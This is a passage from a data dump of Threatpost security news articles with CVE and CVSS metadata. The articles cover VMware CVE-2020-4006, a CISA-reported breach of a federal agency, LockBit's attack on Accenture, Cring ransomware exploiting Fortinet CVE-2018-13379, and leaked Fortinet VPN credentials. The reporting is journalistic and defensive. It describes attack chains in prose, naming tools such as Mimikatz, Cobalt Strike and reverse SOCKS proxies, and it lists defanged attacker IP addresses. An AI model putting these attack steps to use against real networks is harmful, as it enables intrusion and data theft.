vulnerability was disclosed in November, the company issued workarounds \u201cfor a temporary solution to prevent exploitation of CVE-2020-4006,\u201d with the tradeoff that configurator-managed setting changes are possible while the workaround is in place. However, a full patch is now available.\n\nThe products impacted by the vulnerability are:\n\n * VMware Workspace One Access (Access)\n * VMware Workspace One Access Connector (Access Connector)\n * VMware Identity Manager (vIDM)\n * VMware Identity Manager Connector (vIDM Connector)\n * VMware Cloud Foundation\n * vRealize Suite Lifecycle Manager\n\nVersions impacted are:\n\n * VMware Workspace One Access 20.01, 20.10 (Linux)\n * VMware Identity Manager 3.3.3, 3.3.2, 3.3.1 (Linux)\n * VMware Identity Manager Connector 3.3.2, 3.3.1 (Linux)\n * VMware Identity Manager Connector 3.3.3, 3.3.2, 3.3.1 (Windows)\n * VMware Cloud Foundation 4.x (Linux and Windows)\n * vRealize Suite Lifecycle Manager 8.x (Linux and Windows)\n\nThere have been no reports of exploitation in the wild.\n\n**_Put Ransomware on the Run: Save your spot for \u201cWhat\u2019s Next for Ransomware,\u201d a _**[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)**_ on Dec. 16 at 2 p.m. ET. Find out what\u2019s coming in the ransomware world and how to fight back. _**\n\n**_Get the latest from John (Austin) Merritt, Cyber Threat Intelligence Analyst at Digital Shadows, and Israel Barak, CISO at Cybereason, on new kinds of attacks. Topics will include the most dangerous ransomware threat actors, their evolving TTPs and what your organization needs to do to get ahead of the next, inevitable ransomware attack. _**[**_Register here_**](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)**_ for the Wed., Dec. 16 for this LIVE webinar._**\n", "cvss3": {}, "published": "2020-12-04T15:31:15", "type": "threatpost", "title": "VMware Rolls a Fix for Formerly Critical Zero-Day Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-4006"], "modified": "2020-12-04T15:31:15", "id": "THREATPOST:4D13C614BBD9FAF591F7DC6EF25012DD", "href": "https://threatpost.com/vmware-fix-critical-zero-day-bug/161896/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-11-23T21:49:25", "description": "The U.S. Cybersecurity and Infrastructure Security Agency is [warning](<https://us-cert.cisa.gov/ncas/current-activity/2020/11/23/vmware-releases-workarounds-cve-2020-4006>) of a zero-day bug affecting six VMware products including its Workspace One, Identity Manager and vRealize Suite Lifecycle Manager.\n\nThe critical unpatched bug is a command injection vulnerability.\n\nIn a [separate VMware advisory](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>), the company did not indicate whether the vulnerability was under active attack. Tracked as [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>), the bug has a CVSS severity rating of 9.1 out of 10. The company said patches are \u201cforthcoming\u201d and that workarounds \u201cfor a temporary solution to prevent exploitation of CVE-2020-4006\u201d are available.[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cA malicious actor with network access to the administrative configurator on port 8443 and a valid password for the configurator admin account can execute commands with unrestricted privileges on the underlying operating system,\u201d VMware wrote.\n\nThe products impacted by the vulnerability are:\n\n * VMware Workspace One Access (Access)\n * VMware Workspace One Access Connector (Access Connector)\n * VMware Identity Manager (vIDM)\n * VMware Identity Manager Connector (vIDM Connector)\n * VMware Cloud Foundation\n * vRealize Suite Lifecycle Manager\n\nA total of 12 product versions are impacted.\n\nWorkarounds [outlined by VMware](<https://kb.vmware.com/s/article/81731>) are \u201cmeant to be a temporary solution only, and customers are advised to follow [VMSA-2020-0027](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>) to be alerted when patches are available,\u201d wrote the company.\n\nVersions impacted include:\n\n * VMware Workspace One Access 20.10 (Linux)\n * VMware Workspace One Access 20.01 (Linux)\n * VMware Identity Manager 3.3.3 (Linux)\n * VMware Identity Manager 3.3.2 (Linux)\n * VMware Identity Manager 3.3.1 (Linux)\n * VMware Identity Manager Connector 3.3.2, 3.3.1 (Linux)\n * VMware Identity Manager Connector 3.3.3, 3.3.2, 3.3.1 (Windows)\n\nThe workaround tradeoff, once implemented, is that in each of the VMware services, configurator-managed setting changes will not be possible while the workaround is in place.\n\n\u201cIf changes are required please revert the workaround following the instructions \u2026 make the required changes and disable again until patches are available. In addition, most of the system diagnostics dashboard will not be displayed,\u201d VMware explained.\n", "cvss3": {}, "published": "2020-11-23T21:46:22", "type": "threatpost", "title": "Critical VMware Zero-Day Bug Allows Command Injection; Patch Pending", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-4006"], "modified": "2020-11-23T21:46:22", "id": "THREATPOST:B06EA8F95761CA94B8942CEFC7900B67", "href": "https://threatpost.com/vmware-zero-day-patch-pending/161523/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-16T22:09:34", "description": "A federal agency has suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) [issued an alert](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a>) on Thursday, not naming the agency but providing technical details of the attack. Hackers, it said, gained initial access by using employees\u2019 legitimate Microsoft Office 365 log-in credentials to sign onto an agency computer remotely.\n\n\u201cThe cyber-threat actor had valid access credentials for multiple users\u2019 Microsoft Office 365 (O365) accounts and domain administrator accounts,\u201d according to CISA. \u201cFirst, the threat actor logged into a user\u2019s O365 account from Internet Protocol (IP) address 91.219.236[.]166 and then browsed pages on a SharePoint site and downloaded a file. The cyber-threat actor connected multiple times by Transmission Control Protocol (TCP) from IP address 185.86.151[.]223 to the victim organization\u2019s virtual private network (VPN) server.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAs for how the attackers managed to get their hands on the credentials in the first place, CISA\u2019s investigation turned up no definitive answer \u2013 however, it speculated that it could have been a result of a vulnerability exploit that it said has been rampant across government networks.\n\n\u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability\u2014CVE-2019-11510\u2014in Pulse Secure,\u201d according to the alert. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\nThe patch was issued in April of 2019, but the Department of Homeland Security (DHS) in April of this year [noted that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) before the patches were deployed, bad actors were able to compromise Active Directory accounts via the flaw \u2013 so, even those who have patched for the bug could still be compromised and are vulnerable to attack.\n\nAfter initial access, the group set about carrying out reconnaissance on the network. First they logged into an agency O365 email account to view and download help-desk email attachments with \u201cIntranet access\u201d and \u201cVPN passwords\u201d in the subject lines \u2013 and it uncovered Active Directory and Group Policy key, changing a registry key for the Group Policy.\n\n\u201cImmediately afterward, the threat actor used common Microsoft Windows command line processes\u2014conhost, ipconfig, net, query, netstat, ping and whoami, plink.exe\u2014to enumerate the compromised system and network,\u201d according to CISA.\n\nThe next step was to connect to a virtual private server (VPS) through a Windows Server Message Block (SMB) client, using an alias secure identifier account that the group had previously created to log into it; then, they executed plink.exe, a remote administration utility.\n\nAfter that, they connected to command-and-control (C2), and installed a custom malware with the file name \u201cinetinfo.exe.\u201d The attackers also set up a locally mounted remote share, which \u201callowed the actor to freely move during its operations while leaving fewer artifacts for forensic analysis,\u201d CISA noted.\n\nThe cybercriminals, while logged in as an admin, created a scheduled task to run the malware, which turned out to be a dropper for additional payloads.\n\n\u201cinetinfo.exe is a unique, multi-stage malware used to drop files,\u201d explained CISA. \u201cIt dropped system.dll and 363691858 files and a second instance of inetinfo.exe. The system.dll from the second instance of inetinfo.exe decrypted 363691858 as binary from the first instance of inetinfo.exe. The decrypted 363691858 binary was injected into the second instance of inetinfo.exe to create and connect to a locally named tunnel. The injected binary then executed shellcode in memory that connected to IP address 185.142.236[.]198, which resulted in download and execution of a payload.\u201d\n\nIt added, \u201cThe cyber-threat actor was able to overcome the agency\u2019s anti-malware protection, and inetinfo.exe escaped quarantine.\u201d\n\nCISA didn\u2019t specify what the secondary payload was \u2013 Threatpost has reached out for additional information.\n\nThe threat group meanwhile also established a backdoor in the form of a persistent Secure Socket Shell (SSH) tunnel/reverse SOCKS proxy.\n\n\u201cThe proxy allowed connections between an attacker-controlled remote server and one of the victim organization\u2019s file servers,\u201d according to CISA. \u201cThe reverse SOCKS proxy communicated through port 8100. This port is normally closed, but the attacker\u2019s malware opened it.\u201d\n\nA local account was then created, which was used for data collection and exfiltration. From the account, the cybercriminals browsed directories on victim file servers; copied files from users\u2019 home directories; connected an attacker-controlled VPS with the agency\u2019s file server (via a reverse SMB SOCKS proxy); and exfiltrated all the data using the Microsoft Windows Terminal Services client.\n\nThe attack has been remediated \u2013 and it\u2019s unclear when it took place. CISA said that it\u2019s intrusion-detection system was thankfully able to eventually flag the activity, however.\n\n\u201cCISA became aware\u2014via EINSTEIN, CISA\u2019s intrusion-detection system that monitors federal civilian networks\u2014of a potential compromise of a federal agency\u2019s network,\u201d according to the alert. \u201cIn coordination with the affected agency, CISA conducted an incident response engagement, confirming malicious activity.\u201d\n", "cvss3": {}, "published": "2020-09-24T20:47:40", "type": "threatpost", "title": "Feds Hit with Successful Cyberattack, Data Stolen", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510"], "modified": "2020-09-24T20:47:40", "id": "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "href": "https://threatpost.com/feds-cyberattack-data-stolen/159541/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-13T13:06:12", "description": "081321 08:42 UPDATE: Accenture reportedly acknowledged in an internal memo that attackers stole client information and work materials in a July 30 \u201csecurity incident.\u201d\n\n[CyberScoop](<https://www.cyberscoop.com/accenture-ransomware-lockbit/>) reports that the memo downplays the impact of the ransomware attack. The outlet quoted Accenture\u2019s internal memo: \u201cWhile the perpetrators were able to acquire certain documents that reference a small number of clients and certain work materials we had prepared for clients, none of the information is of a highly sensitive nature,\u201d it reads. Threatpost has asked Accenture to comment on CyberScoop\u2019s report.\n\nEarlier this week, the LockBit ransomware-as-a-service (RaaS) gang published the name and logo of what has now been confirmed as one of its latest victims: Accenture, a global business consulting firm with an insider track on some of the world\u2019s biggest, most powerful companies.\n\nAccenture\u2019s clients include 91 of the Fortune Global 100 and more than three-quarters of the Fortune Global 500. According to its [2020 annual report;](<https://www.accenture.com/us-en/about/company/annual-report>) that includes e-commerce giant Alibaba, Cisco and Google. Valued at $44.3 billion, Accenture is one of the world\u2019s largest tech consultancy firms, and employs around 569,000 people across 50 countries.\n\nIn a post on its Dark Web site, LockBit offered up Accenture databases for sale, along with a requisite jab at what the gang deemed to be Accenture\u2019s pathetic security.\n\n> \u201cThese people are beyond privacy and security. I really hope that their services are better than what I saw as an insider. If you are interested in buying some databases, reach us.\u201d \n\u2014LockBit site post.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/11162046/LockBit-site-screengrab.png>)\n\nLockBit dark-web site screen capture. Source: Cybereason.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nAccording to [Security Affairs](<https://securityaffairs.co/wordpress/121048/data-breach/accenture-lockbit-2-0-ransomware-attack.html?utm_source=rss&utm_medium=rss&utm_campaign=accenture-lockbit-2-0-ransomware-attack>), at the end of a ransom payment clock\u2019s countdown, a leak site showed a folder named W1 that contained a collection of PDF documents allegedly stolen from the company. LockBit operators claimed to have gained access to Accenture\u2019s network and were preparing to leak files stolen from Accenture\u2019s servers at 17:30:00 GMT.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/11174155/countdown-clock-e1628718131517.png>)\n\nLockBit countdown clock. Source: Cyble.\n\nThe news hit the headlines late Wednesday morning Eastern Time, after CNBC reporter Eamon Javers [tweeted](<https://twitter.com/EamonJavers/status/1425476619934838785>) about the gang\u2019s claim that it would be releasing data within coming hours and that it was offering to sell insider Accenture information to interested parties.\n\n> A hacker group using Lockbit Ransomware says they have hacked the consulting firm Accenture and will release data in several hours, CNBC has learned. They are also offering to sell insider Accenture information to interested parties.\n> \n> \u2014 Eamon Javers (@EamonJavers) [August 11, 2021](<https://twitter.com/EamonJavers/status/1425476619934838785?ref_src=twsrc%5Etfw>)\n\n## Blessed Be the Backups\n\nYes, we were hit, but we\u2019re A-OK now, Accenture confirmed: \u201cThrough our security controls and protocols, we identified irregular activity in one of our environments. We immediately contained the matter and isolated the affected servers,\u201d it said in a statement. \u201cWe fully restored our affected systems from backup, and there was no impact on Accenture\u2019s operations, or on our clients\u2019 systems.\u201d\n\nAccording to [BleepingComputer](<https://www.bleepingcomputer.com/news/security/accenture-confirms-hack-after-lockbit-ransomware-data-leak-threats/>), the group that threatened to publish Accenture\u2019s data \u2013 allegedly stolen during a recent cyberattack \u2013 is known as LockBit 2.0.\n\nAs explained by Cybereason\u2019s Tony Bradley in a Wednesday [post](<https://www.cybereason.com/blog/rising-threat-from-lockbit-ransomware>), the LockBit gang is similar to its ransomware-as-a-service (RaaS) brethren DarkSide and REvil: Like those other operations. LockBit uses an affiliate model to rent out its ransomware platform, taking a cut of any ransom payments that result.\n\nBradley noted that the LockBit gang is apparently on a hiring spree in the wake of [DarkSide](<https://threatpost.com/darksides-servers-shutdown/166187/>) and [REvil](<https://threatpost.com/whats-next-revil-victims/167926/>) both shutting down operations.\n\n\u201cThe wallpaper displayed on compromised systems now includes text inviting insiders to help compromise systems \u2013 promising payouts of millions of dollars,\u201d Bradley wrote.\n\n## Insider Job?\n\nCyble researchers suggested in a [Tweet stream](<https://twitter.com/AuCyble/status/1425422006690881541>) that this could be an insider job. \u201cWe know #LockBit #threatactor has been hiring corporate employees to gain access to their targets\u2019 networks,\u201d the firm tweeted, along with a clock counting down how much time was left for Accenture to cough up the ransom.\n\n> Potential insider job? We know [#LockBit](<https://twitter.com/hashtag/LockBit?src=hash&ref_src=twsrc%5Etfw>) [#threatactor](<https://twitter.com/hashtag/threatactor?src=hash&ref_src=twsrc%5Etfw>) has been hiring corporate employees to gain access to their targets' networks.[#ransomware](<https://twitter.com/hashtag/ransomware?src=hash&ref_src=twsrc%5Etfw>) [#cyber](<https://twitter.com/hashtag/cyber?src=hash&ref_src=twsrc%5Etfw>) [#cybersecurity](<https://twitter.com/hashtag/cybersecurity?src=hash&ref_src=twsrc%5Etfw>) [#infosec](<https://twitter.com/hashtag/infosec?src=hash&ref_src=twsrc%5Etfw>) [#accenture](<https://twitter.com/hashtag/accenture?src=hash&ref_src=twsrc%5Etfw>) [pic.twitter.com/ZierqRVIjj](<https://t.co/ZierqRVIjj>)\n> \n> \u2014 Cyble (@AuCyble) [August 11, 2021](<https://twitter.com/AuCyble/status/1425391442248097792?ref_src=twsrc%5Etfw>)\n\nCyble said that LockBit claimed to have made off with databases of more than 6TB and that it demanded $50 million as ransom. The threat actors themselves alleged that this was an insider job, \u201cby someone who is still employed there,\u201d though Cyble called that \u201cunlikely.\u201d\n\nSources familiar with the attack told BleepingComputer that Accenture confirmed the ransomware attack to at least one computer telephony integration (CTI) vendor and that it\u2019s in the process of notifying more customers. According to a [tweet](<https://twitter.com/HRock/status/1425447533598453760?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1425447533598453760%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Faccenture-confirms-hack-after-lockbit-ransomware-data-leak-threats%2F>) from threat intelligence firm Hudson Rock, the attack compromised 2,500 computers used by employees and partners, leading the firm to suggest that \u201cthis information was certainly used by threat actors.\u201d\n\nIn a [security alert ](<https://www.cyber.gov.au/acsc/view-all-content/alerts/lockbit-20-ransomware-incidents-australia>)issued last week, the Australian Cyber Security Centre (ACSC) warned that LockBit 2.0 ransomware attacks against Australian organizations had started to rise last month, and that they were coupled with threats to publish data in what\u2019s known as [double-extortion attacks](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>).\n\n\u201cThis activity has occurred across multiple industry sectors,\u201d according to the alert. \u201cVictims have received demands for ransom payments. In addition to the encryption of data, victims have received threats that data stolen during the incidents will be published.\u201d\n\nThe ACSC noted ([PDF](<https://www.cyber.gov.au/sites/default/files/2021-08/2021-006%20ACSC%20Ransomware%20Profile%20-%20Lockbit%202.0.pdf>)) that it\u2019s recently observed LockBit threat actors actively exploiting existing vulnerabilities in the Fortinet FortiOS and FortiProxy products, identified as CVE-2018-13379, in order to gain initial access to specific victim networks. That vulnerability, a path-traversal flaw in the SSL VPN, has been exploited in multiple attacks over the years:\n\nIn April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) that advanced persistent threat (APT) nation-state actors were actively exploiting it to gain a foothold within networks before moving laterally and carrying out recon, for example.\n\n## Known Vulnerability Exploited?\n\nRon Bradley, vice president of third-party risk-management firm Shared Assessments, told Threatpost on Wednesday that the Accenture incident is \u201ca prime example of the difference between business resiliency and business continuity. Business resiliency is like being in a boxing match, you take a body blow but can continue the fight. Business continuity comes into play when operations have ceased or severely impaired and you have to make major efforts to recover.\n\n\u201cThis particular example with Accenture is interesting in the fact that it was a known/published vulnerability,\u201d Bradley continued. It highlights the importance of making sure systems are properly patched in a timely manner. The ability for Accenture to manage the repercussions of potentially stolen data will be an important lesson for many organizations going forward.\u201d\n\nHitesh Sheth, president and CEO at the cybersecurity firm Vectra, said that all businesses should expect attacks like this, but particularly a global consultancy firm with links to so many companies.\n\n\u201cFirst reports suggest Accenture had data backup protocols in place and moved quickly to isolate affected servers,\u201d he told Threatpost on Wednesday. \u201cIt\u2019s too soon for an outside observer to assess damage. However, this is yet another reminder to businesses to scrutinize security standards at their vendors, partners, and providers. Every enterprise should expect attacks like this \u2013 perhaps especially a global consulting firm with links to so many other companies. It\u2019s how you anticipate, plan for and recover from attacks that counts.\u201d\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-11T21:56:00", "type": "threatpost", "title": "Accenture Confirms LockBit Ransomware Attack", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-08-11T21:56:00", "id": "THREATPOST:3CC83DBBAFE2642F4E6D533DDC400BF6", "href": "https://threatpost.com/accenture-lockbit-ransomware-attack/168594/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-04-08T21:27:05", "description": "Threat actors are exploiting a Fortinet vulnerability flagged by the feds last week that delivers a new ransomware strain, dubbed Cring, that is targeting industrial enterprises across Europe.\n\nResearchers say the attackers are exploiting an unpatched path-reversal flaw, tracked as [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>), in Fortinet\u2019s FortiOS. The goal is to gain access to victims enterprise networks and ultimately deliver ransomware, according to a [report by Kaspersky researchers published](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) this week.\n\n\u201cIn at least in one case, an attack of the ransomware resulted in a temporary shutdown of the industrial process due to servers used to control the industrial process becoming encrypted,\u201d Kaspersky senior security researcher Vyacheslav Kopeytsev wrote in the report. \n[](<https://threatpost.com/newsletter-sign/>)\n\nCring is relatively new to the ransomware threat landscape\u2014which already includes dominant strains [REvil](<https://threatpost.com/revil-claims-ransomware-attacks/164739/>), [Ryuk](<https://threatpost.com/ransomware-attack-spain-employment-agency/164703/>), [Maze and](<https://threatpost.com/maze-ransomware-cognizant/154957/>) [Conti](<https://threatpost.com/conti-40m-ransom-florida-school/165258/>). Cring was first [observed and reported](<https://id-ransomware.blogspot.com/2021/01/cring-ransomware.html>) by the researcher who goes by Amigo_A and Swisscom\u2019s CSIRT team in January. The ransomware is unique in that it uses two forms of encryption and destroys backup files in an effort to antagonize victims and prevent them from retrieving backup files without paying the ransom.\n\nLast week, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) that nation-state advanced persistent threat (APT) groups were actively exploiting known security vulnerabilities in the Fortinet FortiOS operating system, affecting the company\u2019s SSL VPN products.\n\nOne of those bugs, is CVE-2018-13379, a path-traversal flaw in Fortinet FortiOS. The vulnerability is tied to system\u2019s SSL VPN web portal and allows an unauthenticated attacker to download system files of targeted systems via a specially crafted HTTP resource requests.\n\nIn its report Kaspersky echoed the feds\u2019 warning adding attackers are first scanning connections to Fortinet VPNs to see if the software used on the device is the vulnerable version. In the campaign researchers observed, threat actors follow an exploit chain, exploiting CVE-2018-13379 to launch a directory-traversal attack. The goal is to crack open affected hardware, give adversaries access to network credentials and to establish foothold in the targeted network, Kopeytsev explained.\n\n\u201cA directory-traversal attack allows an attacker to access system files on the Fortigate SSL VPN appliance,\u201d he wrote. \u201cSpecifically, an unauthenticated attacker can connect to the appliance through the internet and remotely access the file \u2018sslvpn_websession,\u2019 which contains the username and password stored in cleartext.\u201d\n\nFor it\u2019s part, \u201cthe security of our customers is our first priority,\u201d according to a statement from Fortinet provided to Threatpost. \u201cFor example, CVE-2018-13379 is an old vulnerability resolved in May 2019. Fortinet immediately issued a _[PSIRT advisory](<https://fortiguard.com/psirt/FG-IR-18-384> \"https://fortiguard.com/psirt/fg-ir-18-384\" )_ and communicated directly with customers and via corporate blog posts on multiple occasions in _[August 2019](<https://www.fortinet.com/blog/business-and-technology/fortios-ssl-vulnerability> \"https://www.fortinet.com/blog/business-and-technology/fortios-ssl-vulnerability\" )_ and _[July 2020 ](<https://www.fortinet.com/blog/business-and-technology/atp-29-targets-ssl-vpn-flaws> \"https://www.fortinet.com/blog/business-and-technology/atp-29-targets-ssl-vpn-flaws\" )_strongly recommending an upgrade. Upon resolution we have consistently communicated with customers as recently as late as 2020. If customers have not done so, we urge them to immediately implement the upgrade and mitigations.\u201d\n\n## **Anatomy of an Attack**\n\nOnce gaining access to the first system on the enterprise network, attackers use the Mimikatz utility to steal the account credentials of Windows users who had previously logged in to the compromised system, according to Kaspersky.\n\nIn this way, attackers compromised the domain administrator account, and then used [commodity tools](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>) like Cobalt Stroke backdoor and Powershell to propagate attacks across various systems on the network, according to the report.\n\nAfter gaining complete control, attackers download a cmd script to launch Cring ransomware, naming the malicious execution script \u201cKaspersky\u201d to disguise it as a security solution, Kopeytsev said.\n\nThe report breaks down how Cring achieves encryption and destroys existing backup files once it\u2019s launched on a system. First, the ransomware stops various services of two key programs on the network\u2014Veritas NetBackup and Microsoft SQL server.\n\nCring also halts the SstpSvc service, which is used to create VPN connections, which researchers surmised was to block any remediation effort by system administrators, Kopeytsev said.\n\n\u201cIt is most likely that the attackers, who at this stage controlled the infected system via Cobalt Strike, did this to make it impossible to connect to the infected system remotely via VPN,\u201d he wrote. \u201cThis was done to prevent system administrators from providing a timely response to the information security incident.\u201d\n\nCring proceeds by terminating other application processes in Microsoft Office and Oracle Database software to facilitate encryption as well as the removal of key backup files to prevent recovery of files, according to the report.\n\nIn its final step, Cring starts to encrypt files using strong encryption algorithms so victims can\u2019t decrypt files without knowing the RSA private key held by the attackers, Kopeytsev explained. First each file is encrypted using an AES encryption key and then that key is in turn encrypted using a 8,192-bit RSA public key hard-coded into the malicious program\u2019s executable file, he wrote.\n\nOnce encryption is complete, the malware drops a ransom note from attackers asking for two bitcoins (currently the equivalent of about $114,000) in exchange for the encryption key.\n\n## **Learning from Mistakes**\n\nThe report points out key mistakes made by network administrators in the attack observed by Kaspersky researchers in the hopes that other organizations can learn from them. First the attack highlights once again the importance of keeping systems updated with the latest patches, which could have avoided the incident altogether, Kopeytsev said.\n\n\u201cThe primary causes of the incident include the use of an outdated and vulnerable firmware version on the Fortigate VPN server (version 6.0.2 was used at the time of the attack), which enabled the attackers to exploit the CVE-2018-13379 vulnerability and gain access to the enterprise network,\u201d he wrote.\n\nSystem administrators also left themselves open to attack by not only running an antivirus (AV) system that was outdated, but also by disabling some components of AV that further reduced the level of protection, according to the report.\n\nKey errors in configuring privileges for domain policies and the parameteres of RDP access also came into play in the attack, basically giving attackers free rein once they entered the network, Kopeytsev observed.\n\n\u201cThere were no restrictions on access to different systems,\u201d he wrote. \u201cIn other words, all users were allowed to access all systems. Such settings help attackers to distribute malware on the enterprise network much more quickly, since successfully compromising just one user account provides them with access to numerous systems.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-08T14:00:32", "type": "threatpost", "title": "Hackers Exploit Fortinet Flaw in Sophisticated Cring Ransomware Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379"], "modified": "2021-04-08T14:00:32", "id": "THREATPOST:35A43D6CB9FAF8966F5C0D20045D1166", "href": "https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-10T13:33:05", "description": "Credentials pilfered from 87,000 unpatched Fortinet SSL-VPNs have been posted online, the company has [confirmed](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>).\n\nOr then again, maybe the number is far greater. On Wednesday, [BleepingComputer](<https://www.bleepingcomputer.com/news/security/hackers-leak-passwords-for-500-000-fortinet-vpn-accounts/>) reported that it\u2019s been in touch with a threat actor who leaked a list of nearly half a million Fortinet VPN credentials, allegedly scraped from exploitable devices last summer.\n\nThe news outlet has analyzed the file and reported that it contains VPN credentials for 498,908 users over 12,856 devices. BleepingComputer didn\u2019t test the credentials but said that all of the IP addresses check out as Fortinet VPN servers.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nAccording to analysis done by [Advanced Intel](<https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings>), the IP addresses are for devices worldwide. As the chart below shows, there are 22,500 victimized entities located in 74 countries, with 2,959 of them being located in the US.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/09180501/distribution-e1631225115765.jpg>)\n\nThe geographical distribution of the Fortinet VPN SSL list. Source: Advanced Intel.\n\nUPDATE: Threatpost reached out to Fortinet for clarification on how many devices were compromised. A spokesperson\u2019s reply reiterated the statement put out on Wednesday:\n\n\u201cThe security of our customers is our first priority. Fortinet is aware that a malicious actor has disclosed on a dark web forum, SSL-VPN credentials to access FortiGate SSL-VPN devices. The credentials were obtained from systems that have not yet implemented the patch update provided in May 2019. Since May 2019, Fortinet has continuously communicated with customers urging the implementation of mitigations, including corporate blog posts in [August 2019](<https://urldefense.proofpoint.com/v2/url?u=https-3A__www.fortinet.com_blog_business-2Dand-2Dtechnology_fortios-2Dssl-2Dvulnerability&d=DwMGaQ&c=tEbGsWWjqkBSpaWdXc_mdMSanI1bDu-FKXiKGCfVmPM&r=ci047yKZbNETIRLbYhPR9hvS9MgdS6HahLetj-MiY5k&m=S-tLJEaNHed7zOH8JaLd3mVoBNXqYMeUqJMrJaXLE9s&s=LGgVh3l8kre7r4f1ssl1_Kz9MXkRjaAznfUi1BMjzpc&e=>), [July 